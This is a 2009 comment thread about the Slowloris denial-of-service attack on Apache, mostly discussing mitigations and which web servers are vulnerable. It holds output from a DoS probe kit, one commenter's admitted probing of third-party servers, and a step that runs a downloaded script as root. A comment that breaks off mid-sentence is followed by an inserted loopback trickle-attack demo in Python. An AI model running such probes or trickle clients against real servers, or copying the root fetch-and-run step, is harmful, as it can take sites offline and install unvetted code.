anyway i was more fed up with the antiddos business morons that can (and usually will) kill your business faster than 1000 script kiddies working together.
that was just an example of an attack that most antiddos gurus won't be able to stop very soon.
# Wietse Wind Says:
June 20th, 2009 at 2:14 am

Here's a quick and easy 'fix' using iptables, cron and netstat (and wget to install). This will probably run on about any Linux-webserver.

sudo -i
cd /tmp/
wget hosting.servxs.net/files/install-antiloris.sh
/bin/sh install-antiloris.sh
exit

Source:
Install script: hosting.servxs.net/files/install-antiloris.sh
Antiloris script: hosting.servxs.net/files/antiloris.txt

Good luck!
# B10m Says:
June 20th, 2009 at 4:09 am

RSnake, on the slowloris page you mention:

“Requirements: This is a PERL program requiring the PERL interpreter”

Please, please, please! Perl is not an acronym. So to be correct, it'd be “Requirements: This is a Perl program requiring perl (the Perl interpreter)”.

faq.perl.org/perlfaq1.html#What_s_the_differenc
# Eghie Says:
June 20th, 2009 at 6:08 am

iptables should block it, via hitcount, if the source is a single IP:

iptables -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
iptables -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 60 --hitcount 20 -j LOG
iptables -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 60 --hitcount 20 -j DROP
iptables -A INPUT -p tcp --dport 80 -j ACCEPT

If the source is a botnet with different IPs this will not help.

Put a reverse proxy like Perlbal or Varnish in front. I don't know if they are vulnerable anyway, just need to check that out as well. But I guess they will allow you to handle more requests.
# Mike Adewole Says:
June 20th, 2009 at 7:11 am

@Phil D: mod_limitipconn won't help much if Apache attempts to read the request headers before calling this module. And your check_limit function (yes, I read the code) will misbehave unless the content type is available.

Also, I see no thread synchronization in this function, so the loop that calculates ip_count could have race issues in multithreaded versions of Apache.

Anyway, in order to defeat Slowloris, serialization has to happen based on information from the tcp connection itself (eg the client ip address and/or port) without reading any part of the request beforehand.
# RSnake Says:
June 20th, 2009 at 8:01 am

@B10m - PERL is a holdover from how I originally learned it as “Practical Extraction and Report Language.” Yes, I was taught it incorrectly - that it actually was an acronym. I've been programming a very very long time, and old habits are hard to break. But yes, you're right. But seriously, who gives a crap?
# adrianilarionciobanu Says:
June 20th, 2009 at 8:34 am

there are no quick and easy fixes. not for apkill, at least. for slowloris - lots, since it's single-sourced. slowloris's “dos” mode is easy to filter even by just doing a per-ip connection limit with ipfw/ipt. apkill's “ddos” mode … well … will just kill your apache or any other tcp service, if specially crafted for another tcp service. but any other type of ddos will kill you as well. the difference that apkill makes is that it simulates perfectly a real visitor (well… tons of them). but it can be stopped 101% with a little bit of coding “on the bright side” and with very small chances of killing real visitors (it really depends on the speed of the attack)

anyway, i still don't get why this is regarded as a “bug” after all these years … even after thousands of years of being used as an exploit on humans - starvation. it's not the technique that is different, but the target. all we do is apply these kinds of patterns that are deeply hidden in our perverted minds ;)

what do i think this is?
first, it's pure marketing - the simple possibility of a threat catches you - the end user - in the web. remember, remember, remember. i reloaded the cisco/microsoft dns case on slashdot comments (how they decided that this is the time-to-market for an old, already fixed bug mentioned by djb years ago) but people are just so focused on this “new exploit” that they go blind… you are not really being threatened by anything, at least not unless you are really becoming a victim - and unless you are doing dirty business you are unlikely to become one. you are just being paranoid.
second is “la guerre pour reconnaissance” which isn't as bad as it may sound; in fact this is what drives us to discover more bs (excuse my language)
# adrianilarionciobanu Says:
June 20th, 2009 at 12:22 pm

Suricou(@Digg) made a nice timeline on the topic: digg.com/security/Apache_HTTP_DoS_tool_released
# RSnake Says:
June 20th, 2009 at 12:38 pm

@adrianilarionciobanu - Cool, although I certainly didn't rip off the code. This was the first I've heard of it and until Amit's email I thought I was the first one to talk about it. Of course I now know that was an incorrect assumption even though we did quite a bit of research and never found another DoS tool like it in the public domain. I'd love to see a copy of his code though. In a cursory check on a few search engines I didn't see it laying about.
# adrianilarionciobanu Says:
June 20th, 2009 at 12:55 pm

no no, you're missing the point. i wasn't sure why now, why not earlier, why never. until Suricou told me about anoctopus.c and the recent IFPI/Maqs attack (that as far as i understand was linked to the piratebay case). Now i did not personally check the anoctopus.c source code to see if they used the same technique but if this is the case then my theory verifies. The exploit has no value until a big victim arises (this case) or a big player decides it's time for some other well-thought reason … and that's when the marketing comes to do the real hack. We're just being played here. Well there's at least one thing that i am certain of, my paranoia is healthier than others' ;)
# adrianilarionciobanu Says:
June 20th, 2009 at 2:31 pm

if this is “the” anoctopus.c: ja.pastebin.ca/1439176 then it has nothing to do with the real technique: coded in a rush and it doesn't fully exploit the “capabilities” of an apache server ;) plus from what i know close() on a socket sends a FIN … this code was written by a gentleman :)

everything related to apkill is public domain (at the url mentioned earlier somewhere above).
if you want to test,
0. make sure you have state-threads.sf.net , modify compile.sh and strun.sh to reflect the correct paths
1. make sure you resolve perl deps before sucking links / generating C header
2. don't get scared about apfinger/chinese_death compile time errors, they're supposed to be there. chinese_death is supposed to die at runtime unless a one line fixer.
3. some of the infos on running killap target from the webpage are mistaken - one should read some of the source code to realize what's going on. can't just release a turnkey solution or i'll get to smell toilets.

just to test that a website is vulnerable it's enough to run ap_finger/chinese_death. the first digs the timeout set up on the server side, the second tests if the timeout is “properly” reset when sending a small random byte quantity to the server.

output snips (i just made sure this thing is still running cuz i didnt touch it in more than 2 years):

localhost d # ./ap_finger www.example.com 80
resolving timeout on connection to www.example.com:80, this may take a while depending on remote server setup
wrote 3 bytes to net bufs, waiting on local buffers to flush … buffers flushed to net!
waiting on remote timeout …
error returned as expected,timeout=60 seconds, error_code=0, error_msg=”Success”

localhost d # ./chinese_death www.example.com 80 60
resolving timeout on connection to www.example.com:80, this may take a while depending on remote server setup
starting:
sending 2 bytes to target, memcpy from addr 0
timeout almost reached, write_to_net next 2 bytes SENT: “GE” at 1245533151
sleeping 45 seconds before refreshing buffers…
sleep_done, continue
sending 2 bytes to target, memcpy from addr 2
timeout almost reached, write_to_net next 2 bytes SENT: “T ” at 1245533196
sleeping 42 seconds before refreshing buffers…
sleep_done, continue
sending 4 bytes to target, memcpy from addr 4
timeout almost reached, write_to_net next 4 bytes SENT: “//wh” at 1245533238
^C

conclusion: example.com is vulnerable
# rvdh Says:
June 20th, 2009 at 11:53 pm

@Roland Dobbins

I concur with your thoughts; attacks on the TCP/IP stack are, in my opinion, what gets shoved under the rug, since we all know (or reasonably theoretically assume) that it's virtually impossible to stop denial of service attacks due to the architecture and nature of how clients and servers operate. I understand the standpoint of Apache as well since it's really tough material and it's easy to make very bad decisions in proposing “fixes”; it's in the same league as cryptography as far as I'm concerned, because what you fix in one place you leave open in other places. I'm sure some would propose big buffers and whatnot, creating new problems on top of the issues at hand. That said, I'm more concerned about crashing a kernel with lingering connections by sending a perpetual FIN-WAIT-2, something inherent in insecure KeepAlive connections, and yet no one talks about that, because again, you won't solve these kinds of attacks by fixing this as an individual case, since in the 9 states the TCP datagram goes through there are more theoretical attacks than I can roll my dice on. It's like plugging holes in your boat with shotgun ammo.

Interesting nonetheless, but at the end of the day a DOS can be accomplished on pretty much every box, with some luck with minor resources, with less luck you just resort to your resources in the old fashioned way.

;)
# RSnake Says:
June 21st, 2009 at 9:19 am

Stevan Bajic helped me test and confirm that nginx in a default configuration is vulnerable as well. It required tuning the options slightly (-timeout 20 -num 3000) but it was actually a worse effect than normal and actually kept the machine down for far longer than the attack itself. It was down even minutes later.

EDIT: nevermind - this was due to the log directory itself having been full. False positive!
# adrianilarionciobanu Says:
June 21st, 2009 at 12:06 pm

@RSnake
i don't think it's a false positive. nginx is a lady and promptly resets the timer on the next byte(s) received.
i ran an nginx with defaults a few minutes ago (./nginx -p ../ where ../ is build root)

localhost objs # HEAD localhost:80 |grep -E '^Server:'
Server: nginx/0.8.3

cia@localhost ~/dev/d $ ./ap_finger 127.0.0.1 80
resolving timeout on connection to 127.0.0.1:80, this may take a while depending on remote server setup
wrote 2 bytes to net bufs, waiting on local buffers to flush … buffers flushed to net!
waiting on remote timeout …
error returned as expected,timeout=60 seconds, error_code=0, error_msg=”Success”

cia@localhost ~/dev/d $ ./chinese_death localhost 80 60
resolving timeout on connection to localhost:80, this may take a while depending on remote server setup
starting:
sending 4 bytes to target, memcpy from addr 0
timeout almost reached, write_to_net next 4 bytes SENT: “GET ” at 1245610849
sleeping 55 seconds before refreshing buffers…
sleep_done, continue
sending 2 bytes to target, memcpy from addr 4
timeout almost reached, write_to_net next 2 bytes SENT: “//” at 1245610904
sleeping 50 seconds before refreshing buffers…
sleep_done, continue
sending 2 bytes to target, memcpy from addr 6
timeout almost reached, write_to_net next 2 bytes SENT: “im” at 1245610954
# adrianilarionciobanu Says:
June 21st, 2009 at 12:36 pm

i got tricked as well by the client_header_timeout directive.
it seems that indeed nginx does not reset the timer but will kill the connection a few seconds later, on the next bytes received after the timer expired
setting client_header_timeout to 10 seconds allowed me to send a few bytes in a 12 second interval but on the next send i went bananas. not sure if it's the tcp stack that announced me later or the timer is checked only on the next receive, but i doubt the second case.

i apologize for spamming with a false alarm
# adrianilarionciobanu Says:
June 21st, 2009 at 12:40 pm

sorry, i got it. it's the tcp stack that tries to resend (i got some bytes still queued in the kernel buffers when that shouldn't happen unless the peer doesn't care about me; nginx prolly doesn't care to announce a timeout immediately, which is nice) and the timer is respected properly. nice ;)
# adrianilarionciobanu Says:
June 21st, 2009 at 1:06 pm

hoping that helps you, at least to confirm or question already made tests:

nginx 0.8.3 - NOT vulnerable
cherokee 0.99.17 - NOT vulnerable

lighttpd 1.4.20 - vulnerable
apache 2.2.11 - vulnerable

i'm really sorry for the nginx false alert. i really liked it for correctly ignoring me. cherokee made a friendly tcp announcement that he's gonna quit ;)
# adrianilarionciobanu Says:
June 21st, 2009 at 1:24 pm

boa - vulnerable
zeus - vulnerable (i was forced to test www.zeus.com. no harm done.)
# adrianilarionciobanu Says:
June 21st, 2009 at 1:54 pm

sun web server - vulnerable (tested remote same as zeus)

on the remote tests - not 100% assured; normally one only needs to guess the timers and then check if they are being reset “properly”. if the timers seem to be reset then normally my connection shouldn't be killed too soon even in the case of a big server load - i can assume starvation will happen. but i may be wrong.
# Nick Lowe Says:
June 22nd, 2009 at 2:35 am

Please could you explain why you consider Squid to be vulnerable?

I posted to their Bugzilla and got the following response:

“Thank you for the info and pointer.

I find it interesting that the article mentions Squid in the threaded web
server section. They seem not to have all their facts lined up right.

Squid does not use threads beyond the basic one every app has, and has long
provided a number of mechanisms for protection against these types of attack.
Parallel POSTs does seem to be a new approach to the old problem though.

As they do mention “This also may not work if there is an upstream device that
somehow limits/buffers/proxies HTTP requests” …such as Squid.

If you are able to do any requests testing on current Squid we will be
grateful. It is one of the areas lacking in test info presently.

This issue can easily be avoided by reducing the request_timeout and
read_timeout settings from minutes to a number of seconds. Also increasing the
max_filedescriptors or ulimit. Operations which are routinely tuned by
administrators.”
# Nick Lowe Says:
June 22nd, 2009 at 2:35 am

www.squid-cache.org/bugs/show_bug.cgi?id=2694
# Daniel H. Says:
June 22nd, 2009 at 3:08 am

Apache 2.2 patch which works:

This patch is available under the following URL: synflood.at/tmp/anti-slowloris.diff.

Tested against Apache 2.2.10 on a gentoo system.
# JY Says:
June 22nd, 2009 at 11:30 am

@Daniel H.
The link you provided doesn't work.
# adrianilarionciobanu Says:
June 22nd, 2009 at 12:00 pm

@JY: delete the '.' at the end
# adrianilarionciobanu Says:
June 22nd, 2009 at 12:54 pm

@Nick Lowe:
squid - NOT vulnerable
i just tested it
# adrianilarionciobanu Says:
June 22nd, 2009 at 1:05 pm

anyway i think testing http services is useless and will just piss off people. can't really blame, for example, apache for being … politically correct, as i commented on
isc.sans.org/diary.html?storyid=6613
# adrianilarionciobanu Says:
June 22nd, 2009 at 1:07 pm

fingerprinting and vulnerability test available for download (as done in 2007; output beautified a little bit and the compile time errors dropped - useless now)

pub.mud.ro/~cia/files/deadsnail/

the ddos tool not cleanedup but still avail from old url
# RSnake Says:
June 22nd, 2009 at 1:07 pm

@All - I will get to squid in a bit but I wanted to update regarding the MPM Event module: httpd.apache.org/docs/2.2/mod/event.html

So we installed it (we already had worker installed but not event). And it worked as advertised - sorta. Once we set Slowloris to -timeout 10 -num 7000 the test site went up and down frequently. So if you can get over the fact that it is “experimental, so it may or may not work as expected” and the fact that “MPM is incompatible with mod_ssl, and other input filters” and the fact that it's still vulnerable but recovers occasionally… it's a pretty good module at keeping your site up some of the time.

IIS on the other hand still has no problems with that same configuration in Slowloris. I still believe IIS has a better model than mpm_event_module.
# adrianilarionciobanu Says:
June 22nd, 2009 at 1:27 pm

@RSnake:
event is for keepalives as far as i know but you can still max out the fdmax or, if you run cgis, it would be easier. as for worker mpm - the policy is the same as for prefork, isn't it? re timeouts - being reset the same way on first byte received. you just have to reach maxthreads instead of maxprocs now.
# S. Says:
June 22nd, 2009 at 1:38 pm

FYI: I made some tests slowloris on some WAF(based on apache) and it failed too.
….
Let the sun shine !
# RSnake Says:
June 22nd, 2009 at 2:22 pm

@All - Good writeup on stopping Slowloris with Cisco's CSS:
www.cupfighter.net/index.php/2009/06/slowloris-css/

@S. - Which WAF broke? That's interesting!
# hanabokuro Says:
June 23rd, 2009 at 2:19 am

I think “AcceptFilter http httpready” will protect from slowloris if your OS is FreeBSD.
Linux doesn't support accf_http kernel module.
# S. Says:
June 23rd, 2009 at 2:39 am

@rsnake: drop me an email to have explanation first
# Robert A Says:
June 23rd, 2009 at 8:27 am

isc.sans.org/diary.html?storyid=6622
# RSnake Says:
June 23rd, 2009 at 12:13 pm

@hanabokuro - yes, try the -httpready switch in Slowloris to get around accf_http (also known as HTTPReady).
# John Terrill Says:
June 23rd, 2009 at 7:07 pm

There has been far too much media coverage of this attack.

We have known about this issue for a long time, which is why a number of load balancers and scalable infrastructures work the way they do. I mean, it's textbook denial of service… Not to mention that commercial sites at high risk of these types of attacks have already implemented protections and monitor traffic well enough that they would just block connections fitting these types of traffic patterns.

Another thing that seems to be exaggerated here is how impactful this attack is. It's not like taking down a web server nets you much. Where is the access to trusted resources or the ability to run arbitrary code?

Now there are outrageous accusations like Iran stating that CNN is trying to teach people how to take down their web servers(http://edition.cnn.com/2009/WORLD/meast/06/22/cnn.iran.claim/index.html). This could have been played very differently and explained more responsibly when explaining the actual risk.

When discussing the media attention surrounding this DoS POC - to quote Family Guy, “this makes about as much sense as Beowulf having sex with Robert Fulton at the First Battle of Antietam”.
# hanabokuro Says:
June 23rd, 2009 at 8:09 pm

@rsnake - thanks for the info.
hmm. accf_http only works with GET & HEAD.
Why doesn't accf_http support POST or other requests?

I tested lighttpd. lighttpd is vulnerable.
lighttpd has a max connection limit. It depends on FD_SETSIZE (max number of file descriptors per process).
lighttpd uses one fd for the connection to the client and one fd to read the HTML file.
So lighttpd's max connection limit is FD_SETSIZE (default is 1024) / 2.

'slowloris.pl -num 600' can DoS lighttpd.
# hanabokuro Says:
June 23rd, 2009 at 9:07 pm

I tested lighttpd again.
The “server.max-worker” config setting worked well.
lighttpd can handle (FD_SETSIZE / 2) * “server.max-worker” connections.
lighttpd is still vulnerable, but it becomes a little harder to DoS.
The attacker needs more connections to DoS it, which means the attack is easier to detect.

I'll change my server to “lighttpd (reverse proxy mode) in front of apache”
with “server.max-worker = 256” in lighttpd.conf and “MaxClients 256”.
# RSnake Says:
June 24th, 2009 at 7:47 am

@John Terrill - Surely you aren't claiming that I am somehow to blame for Iran's distaste for CNN's coverage of a DDoS attack (not DoS) that pre-dates my release of the tool by nearly a week, right? That's a bit of a stretch. And if it's a textbook DoS attack, how is this tool any more of an issue than we had before? If you're simply saying it shouldn't have gotten news coverage, you and I are in agreement. Although I will disagree with your assessment that DoS gives you nothing - please read the two other blog posts on this site regarding DoS over the past month.

I just want Apache to fix their problem. A problem that you rightly said has been fixed by other inline devices and webservers for eons - but not by Apache. I wouldn't have released Slowloris at all if Apache had given me more than a 20 word response indicating that they even cared, or had a reasonable fix forthcoming. I have a feeling the Apache guys are taking their disclosure cues from their Google brethren - it smacks of the same holier-than-thou entitlement BS, instead of willingness to cooperate and work with the user community and admitting that they have problems. Instead they're happy enough to pass the blame onto the network for not compensating for their architectural issues and saying it's old news and fixed by a module that doesn't fix the problem (and breaks other stuff in the process). That's a much easier fix than actually fixing it, isn't it?

Incidentally, if anyone can find a link to the original article that Iran is upset about, I'd be curious to read it.
# RSnake Says:
June 24th, 2009 at 8:19 am

@All - just got word of mod_antiloris hmnet.nl/mod_antiloris-0.1.zip We have not evaluated it yet, and may not have time to today. Comments welcome.
# adrianilarionciobanu Says:
June 24th, 2009 at 9:14 am

@John Terrill: I totally agree with you. If someone can start a war these days then the name is media. Anyway, the original article was meant to prove the exact opposite: that (some of the) companies that promise protection against dos/ddos are bs-ing the customers. And now … it is indeed an exaggeration for the sake of the effect - meant to hit the headlines. The worst thing is that only few people see that …
# adrianilarionciobanu Says:
June 24th, 2009 at 9:18 am

So if someone (lets say the dude that started it) can stop this circus some people would be grateful. There's no bug, there is no flaw. Understand that. Its just a way to exploit friendly neighbours. Like in our daily lives.
# adrianilarionciobanu Says:
June 24th, 2009 at 10:00 am

… and @RSnake: if I were an apache developer taking the decision on this then there would be no fix. Same for any other service marked as vulnerable. vulnerability does not always translate into a bug. If i am going to have my teeth spread all over the parking lot because of some incident with the gangs, for being too friendly and for not wearing a football helmet … well …

my question is this: WHERE do you see a bug in apache? it does it right. nginx doesn't (for example, nor cherokee, and that saved their butter) but these days the right thing is the wrong thing and the wrong thing is the right thing. apache did enough by implementing accept filters. it's true that accf_http will do more harm than good if ddosed and that it doesn't support POST, but think of what POST is (as length); one can write another filter.
i believe that if someone (like apache) acts on this and “fixes” it - that will be a mistake.
# adrianilarionciobanu Says:
June 24th, 2009 at 10:48 am

mod_antiloris - definitely not fixing the problem. i read the source code.

i must explain the problem:

1. there is a Timeout setting that should define how long a connection should be kept open while trying to receive the full request from the client
2. if the Timeout is 30 seconds but i keep sending one byte just one second before the timer expires, the timer is going to be reset. that will allow me to keep the connection open indefinitely long.

fixing the problem:

1. don't reset the timer, it should be kept the
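The two halves of the timer argument in this thread (the problem description in the comment above, and the chinese_death probe output posted earlier, where a few bytes sent just before the server's timeout keep the connection alive) as an added example. This is not code from the thread, from apkill/deadsnail or Slowloris, or from any server named here: it is a toy header reader run under both timeout policies, plus a trickle client in the style of the probe. Everything runs on loopback, all names are mine, and the timeouts are sub-second assumptions scaled down from the thread's seconds so the demo finishes quickly.

```python
"""Added example (not from the thread): does a server's header timeout reset on
every byte received, or bound the whole header phase? The first policy is what
the thread attributes to Apache; the second is the fix proposed in the comment."""
import socket
import threading
import time

HEADER_TIMEOUT = 0.6   # server-side "Timeout", scaled down (assumption)
TRICKLE_GAP = 0.25     # client sends one byte per gap: just under the timeout


def serve_one(listener, policy):
    """Accept one connection and try to read a full request header block.
    policy 'reset':    the deadline restarts on every byte received.
    policy 'absolute': one deadline for the entire header block.
    Returns (bytes_received, seconds_the_socket_was_held)."""
    conn, _ = listener.accept()
    start = time.monotonic()
    deadline = start + HEADER_TIMEOUT
    buf = b""
    try:
        while b"\r\n\r\n" not in buf:
            remaining = deadline - time.monotonic()
            if remaining <= 0:
                break                      # header phase over: drop the client
            conn.settimeout(remaining)
            try:
                chunk = conn.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break                      # client went away
            buf += chunk
            if policy == "reset":
                deadline = time.monotonic() + HEADER_TIMEOUT   # the flaw
    finally:
        conn.close()
    return len(buf), time.monotonic() - start


def trickle_client(port, request, gap, max_bytes):
    """Send the request one byte at a time, sleeping `gap` seconds between
    bytes; stops early once the server has closed the connection."""
    s = socket.create_connection(("127.0.0.1", port))
    sent = 0
    try:
        for b in request[:max_bytes]:
            s.sendall(bytes([b]))
            sent += 1
            time.sleep(gap)
    except OSError:                        # reset/broken pipe: server gave up
        pass
    finally:
        s.close()
    return sent


def run_trial(policy, max_bytes=8):
    """Run one server under `policy` against a trickle client on loopback."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    result = {}

    def server():
        result["got"], result["held"] = serve_one(listener, policy)

    t = threading.Thread(target=server)
    t.start()
    request = b"GET / HTTP/1.1\r\nHost: example\r\n\r\n"   # constructed sample
    trickle_client(port, request, TRICKLE_GAP, max_bytes)
    t.join()
    listener.close()
    return result


if __name__ == "__main__":
    for policy in ("reset", "absolute"):
        r = run_trial(policy)
        print(f"{policy:9s}: socket held {r['held']:.2f}s, "
              f"{r['got']} header bytes read, no complete request")
```

Under the 'reset' policy the server holds the socket for as long as the client keeps trickling (here about eight gaps, well past its own Timeout) without ever receiving a complete request, which multiplied by the connection limit is the whole attack; under the 'absolute' policy the same client is dropped when the header deadline passes, having delivered only a few bytes.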

